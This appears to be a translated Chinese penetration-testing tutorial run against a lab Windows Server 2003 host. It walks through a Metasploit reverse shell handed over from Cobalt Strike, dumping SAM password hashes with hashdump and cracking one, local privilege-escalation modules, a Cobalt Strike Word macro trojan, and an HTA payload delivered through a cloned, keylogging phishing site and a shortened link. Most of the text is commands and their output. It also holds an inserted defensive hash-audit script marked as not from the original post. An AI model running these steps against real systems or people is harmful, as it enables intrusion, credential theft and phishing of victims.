III. Combining with Metasploit: reverse shell
Start Metasploit in Kali with the following command:
msfconsole
┌──(root㉿oldboy)-[~]
└─# msfconsole
---
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
---
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

---
msf6 exploit(multi/handler) > set lhost 10.0.0.200
lhost => 10.0.0.200
---
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
---
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
---
On the target side:
Use Cobalt Strike to create a Listener of type windows/foreign/reverse_tcp, where the IP is Metasploit's IP address (10.0.0.200) and the port is the port Metasploit is listening on (7777).
Start the attack and establish the session:
msf6 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://10.0.0.200:7777
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Staging x86 payload (176220 bytes) ...
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.0.0.200:7777 -> 127.0.0.1) at 2024-05-28 21:41:00 +0800
----
meterpreter > shell
Process 1152 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.0.0.101
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.0.0.254

C:\Documents and Settings\Administrator\桌面>
If other hosts check in, select the msf listener (its port) in the spawn-session dialog, and those hosts can be passed to Metasploit as a reverse shell in the same way.
This way we can use the relevant tools in Metasploit for further penetration.
Further penetration:
C:\Documents and Settings\Administrator\桌面>^C
Terminate channel 1? [y/N] y
--------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  OLDBOY-F74D04FE\Administrator @ OLDBOY-F74D04FE  10.0.0.200:7777 -> 127.0.0.1 (10.0.0.101)

msf6 exploit(multi/handler) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(multi/handler) > use ...
msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  OLDBOY-F74D04FE\Administrator @ OLDBOY-F74D04FE  10.0.0.200:7777 -> 127.0.0.1 (10.0.0.101)
------------
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
----------
meterpreter > hashdump
123:1015:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:31ca4e307dc8dd4939d0ac34166cf041:47acc6d9ea07e60931e2a49bb6433aae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_OLDBOY-F74D04FE:1003:bc210210ecc96be6fd0522aa8ea96524:23561981a86db65e75fd296999b95667:::
IWAM_OLDBOY-F74D04FE:1004:cac4a79fa775cb9b8665ee4c08ed3930:8856078abf69a2bb27f287b8afde005b:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:03ebb3c522071ac94b606f483fc10157:::
meterpreter >
For example: Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Hash value: 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Decoded: 123456
The hash can be decoded through cmd5:
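As an added, defender-side example (not from the original post): a small Python audit of pwdump-format lines like the hashdump output above. It flags accounts that still store an LM hash, which is why a lookup like the one above succeeds so easily on a Windows Server 2003 host that has not enabled NoLMHash, and accounts whose NT hash is the empty-password hash. The sample lines are constructed with fake hash values, apart from the two well-known empty-string hashes.

```python
import re

# Well-known hashes of the empty string in the two SAM hash formats.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump/hashdump line format: user:rid:lm_hash:nt_hash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump_line(line):
    """Return (user, rid, lm, nt) for one hashdump line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return user, int(rid), lm.lower(), nt.lower()


def audit_hashdump(lines):
    """Map each parsed account to a list of findings (empty list means nothing flagged)."""
    findings = {}
    for line in lines:
        parsed = parse_hashdump_line(line)
        if parsed is None:
            continue  # skip prompts, blank lines and anything not in pwdump format
        user, rid, lm, nt = parsed
        issues = []
        if lm != EMPTY_LM:
            issues.append("LM hash stored (NoLMHash not enforced; LM is trivially crackable)")
        if nt == EMPTY_NT:
            issues.append("empty password")
        if rid == 500 and user.lower() != "administrator":
            issues.append("built-in Administrator account renamed")
        findings[user] = issues
    return findings


# Constructed sample in the same format as the hashdump output above (fake hash values).
SAMPLE = [
    "Administrator:500:11111111111111111111111111111111:22222222222222222222222222222222:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_web:1006:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::",
    "meterpreter > hashdump",
]

if __name__ == "__main__":
    for account, issues in audit_hashdump(SAMPLE).items():
        print(account, "->", issues or ["ok"])
```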
Help:
meterpreter > ?

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
The hashes used above came from: meterpreter > hashdump
Privilege escalation in CS
Right-click the session, Execute, Elevate, choose the attack method:
On success a new session is created automatically, elevated to SYSTEM:
Recommendation: do privilege escalation in msf instead (use the exploit/windows/local modules); its payloads are more powerful than those of CS.
Rough workflow for privilege escalation in msf:
┌──(root㉿oldboy)-[~]
└─# msfconsole
-------
msf6 > use exploit/windows/local
19  exploit/windows/local/mqac_write               2014-07-22  average    Yes  MQAC.sys Arbitrary Write Privilege Escalation
20  exploit/windows/local/ms11_080_afdjoinleaf     2011-11-30  average    No   MS11-080 AfdJoinLeaf Privilege Escalation
21  exploit/windows/local/ms13_005_hwnd_broadcast  2012-11-27  excellent  No   MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
----------------
msf6 > use exploit/windows/local/ms11_080_afdjoinleaf
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms11_080_afdjoinleaf) > show options

Module options (exploit/windows/local/ms11_080_afdjoinleaf):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.200       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/ms11_080_afdjoinleaf) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  OLDBOY-F74D04FE\Administrator @ OLDBOY-F74D04FE  10.0.0.200:7777 -> 127.0.0.1 (10.0.0.101)
  2         meterpreter x86/windows  OLDBOY-F74D04FE\Administrator @ OLDBOY-F74D04FE  10.0.0.200:7777 -> 127.0.0.1 (10.0.0.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ OLDBOY-F74D04FE            10.0.0.200:4444 -> 10.0.0.101:1844 (10.0.0.101)

msf6 exploit(windows/local/ms11_080_afdjoinleaf) > run

[*] Started reverse TCP handler on 10.0.0.200:4444
[*] Running against Windows Server 2003 SP2
[-] This meterpreter session is already running as SYSTE
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms11_080_afdjoinleaf) >
Step-by-step interpretation:
- Tried switching to the exploit/windows/local directory to browse the available modules.
- Selected the exploit/windows/local/ms11_080_afdjoinleaf module; Metasploit automatically set the payload to windows/meterpreter/reverse_tcp, which is the payload type this module requires.
- Checked the module and payload options and confirmed that SESSION is set to 3, the listening IP address is 10.0.0.200 and the port is 4444.
- Used the sessions -i command to list all active Meterpreter sessions. There are three sessions, and the third one runs with SYSTEM privileges.
- Tried running the exploit/windows/local/ms11_080_afdjoinleaf module, but received the error message [-] This meterpreter session is already running as SYSTEM. This means the attacker is already inside a session with SYSTEM privileges (session 3), so escalating further through this vulnerability is unnecessary because the privilege level is already the highest.
- Finally, Metasploit confirmed that the exploit completed but no new session was created, which is usually because the privilege level is already maximal and there is nothing left to elevate.
Office macro payload usage
Environment: a Windows XP virtual machine, Office 2003, and the CS software
Step 1: generate the Office macro
Step 2: put the code generated by CS into a Word macro
Delete the original contents and paste in the CS macro trojan, save, close.
After editing the file contents, save and close.
Paste the code generated by CS straight into the macro you created. Note: when experimenting, do not set the macro's location to all active templates and documents; apply it to the current document only, otherwise every Word document opened on this machine will run your trojan. Also, opening the Word document shows a macro prompt, because Word disables all macros by default (newer versions: File > Options > Trust Center > Trust Center Settings; older versions: Tools > Options > Security > Macro Security > select Low).
Open the file:
The listener receives the connection:
HTA web page trojan
HTA is short for HTML Application. It is a software development concept in which HTML saved directly in the HTA format becomes a standalone application, with an interface no different from software built in VB, C++ and other programming languages.
Upload the generated evil.hta to the CS server side:
CS client > Attacks > Phishing Attack > File Download:
Fill in the location of the evil.hta file to upload, URL path /evil.hta under the root, host address: the server's IP, port: your choice, MIME type: default:
Generated URL:
http://10.0.0.200:89/evil.hta
Locating the uploaded file on the server:
CS server side, Kali 2022 (IP: 10.0.0.200)
┌──(root㉿oldboy)-[~]
└─# cd /root/cobaltstrike4

┌──(root㉿oldboy)-[~/cobaltstrike4]
└─# ls
手冊                crackInfo.txt  keytool.exe         peclone
agscript            cs.bat         Ladon               Scripts
c2lint              csnat          Ladon911            teamserver
cobaltstrike.auth   csnat.rar      libicmp64.so        teamserver.bat
cobaltstrike.bat    cs.sh          libicmp.so          third-party
CobaltStrikeCN.jar  data           libtapmanager64.so  uploads
cobaltstrike.jar    ElevateKit     libtapmanager.so
cobaltstrike.store  icon.jpg       logs

┌──(root㉿oldboy)-[~/cobaltstrike4]
└─# cd /root/cobaltstrike4/uploads

┌──(root㉿oldboy)-[~/cobaltstrike4/uploads]
└─# ls
evil.hta
Clone a website:
(If a phishing page was set up earlier, be sure to delete it first, otherwise cloning will throw an error.)
Generated site:
http://10.0.0.200:88/
Generate a short link through an online service:
1. https://uutool.cn/dwz/
2. https://www.metools.info/master/shorturl180.html
Generated short link:
https://3mw.cn/11fa2
The victim must click manually, choose to keep the download, and then run the file:
After it runs, the beacon checks in successfully:
Keylogging was enabled when the site was cloned; view the captured keystrokes under View > Web Log:
Disclaimer:
- This article is for technical research only. Strictly abide by the relevant national laws and regulations and do not use it for illegal purposes. If you have questions about the content, you can leave a comment or send a private message; in case of infringement, please contact the editor.